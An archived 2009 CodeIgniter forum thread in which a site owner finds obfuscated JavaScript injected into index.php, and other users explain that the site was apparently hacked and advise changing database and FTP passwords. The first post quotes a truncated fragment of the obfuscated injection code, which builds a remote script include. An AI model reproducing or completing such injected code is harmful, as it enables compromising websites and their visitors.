![]() |
Error in Line 118 in index.php! - Printable Version +- CodeIgniter Forums (https://forum.codeigniter.com) +-- Forum: Archived Discussions (https://forum.codeigniter.com/forumdisplay.php?fid=20) +--- Forum: Archived Development & Programming (https://forum.codeigniter.com/forumdisplay.php?fid=23) +--- Thread: Error in Line 118 in index.php! (/showthread.php?tid=18844) |
Error in Line 118 in index.php! - El Forum - 05-20-2009 [eluser]growknight[/eluser] Hi! I have a problem with my page powered by CI. It very often give me back this error messege: Error in Line 118 in index.php, becouse some application paste a long code, something like this: Code: <!-- ad -->[removed]judps=(8356,"");rwyjp=(499.>=0.5e1?"t"+"":0x7);bjdup=(6.109e3<=32.?3.:"me"+" "+"s");fviuq=(6.928e3>0.80?"r"+"c="+"'h"+"":3.11e2);wvrjh=(0x556,"");fherp=(27,"'");krvgv=(.63,"w");wcdrg=(46.,"i");bvjmu=(.5>1067.?37.:"d");bqjnc=(4e0,"1 ");pqxpz= Why does it do this? Error in Line 118 in index.php! - El Forum - 05-20-2009 [eluser]Dam1an[/eluser] Well thats not part of CI AFAIK What JS based script you using which manipulate your pages? Error in Line 118 in index.php! - El Forum - 05-21-2009 [eluser]growknight[/eluser] I use mootools on some pages. I never hear about this problems.. Sorry for my english... Error in Line 118 in index.php! - El Forum - 05-21-2009 [eluser]wiredesignz[/eluser] If you did not make this code yourself, then your website security has most likely been compromised (hacked) and this content has been added by someone else. Error in Line 118 in index.php! - El Forum - 05-21-2009 [eluser]TheFuzzy0ne[/eluser] If you're trying to add ads to your site, you've added the JavaScript to the wring index.php file - It needs to be added to a view. Error in Line 118 in index.php! - El Forum - 05-21-2009 [eluser]growknight[/eluser] the ads are in view files, i thogth, its generated by ci, like error messege (i use the original ci index.php, no modify) Or a hack, can i somehow protect the index file, or delete this row(4244char), every time? Ideas? Error in Line 118 in index.php! - El Forum - 05-21-2009 [eluser]TheFuzzy0ne[/eluser] I'd suggest changing your password for your database and FTP account, then you shouldn't ever need to remove it again. Error in Line 118 in index.php! - El Forum - 07-27-2009 [eluser]Unknown[/eluser] Hi I recently encountered the same problem, my site was hacked into with the same obfuscated code. This is the second time my site has been attached and since then i'm now using very long usernames and password upper/lower case symbols and characters. I was also advised to make my folder permissions secure yet they got in a 2nd time. |